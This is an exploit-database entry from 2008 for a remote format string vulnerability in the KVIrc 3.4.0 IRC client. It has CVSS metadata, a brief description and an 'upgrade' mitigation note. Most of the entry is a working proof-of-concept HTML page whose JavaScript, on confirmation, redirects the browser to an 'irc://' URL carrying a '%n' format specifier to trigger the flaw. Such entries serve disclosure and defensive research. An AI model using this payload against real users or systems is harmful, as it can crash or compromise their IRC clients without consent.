KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)

vendor:

KVIrc

by:

Gjoko 'LiquidWorm' Krstic

9.3

CVSS

HIGH

Format String

134

CWE

Product Name: KVIrc

Affected Version From: 3.4.2000

Affected Version To: 3.4.2000

Patch Exists: Yes

Related CWE: N/A

CPE: a:kvirc:kvirc

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)

KVIrc is a free portable IRC client based on the excellent Qt GUI toolkit. A format string vulnerability exists in KVIrc v3.4.0 Virgo, which allows remote attackers to execute arbitrary code via format string specifiers in the 'A:' argument of an 'irc://' URL.

Mitigation:

Upgrade to the latest version of KVIrc

Source

Exploit-DB raw data:

<!--

 KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)

 Summary: KVIrc is a free portable IRC client based on the excellent Qt GUI toolkit.
 KVirc is being written by Szymon Stefanek and the KVIrc Development Team with
 the contribution of many IRC addicted developers around the world.

 Product web page: http://www.kvirc.net/

 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

 liquidworm [t00t] gmail [d0t] com

 http://www.zeroscience.org

 24.10.2008

-->


<html>

<title>KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)</Title>

<head>

<body>

<center> <br /> <br /> <strong>Warning ! :)</strong> </center>

<body bgcolor="#FFFF00">

<script type="text/javascript">

alert("KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)\n\n\t\tby LiquidWorm (c) 2008");

function poc()
{
	window.location.href = "irc://A:%n -i";
}

var answ = confirm("Press OK to start exploitation\nPress Cancel to skip exploitation");

if (answ == true) 
{
	poc();
}

	else
	{
		window.location.href = "http://www.kvirc.net";
	}

</script> </body> </head> </html>

# milw0rm.com [2008-10-24]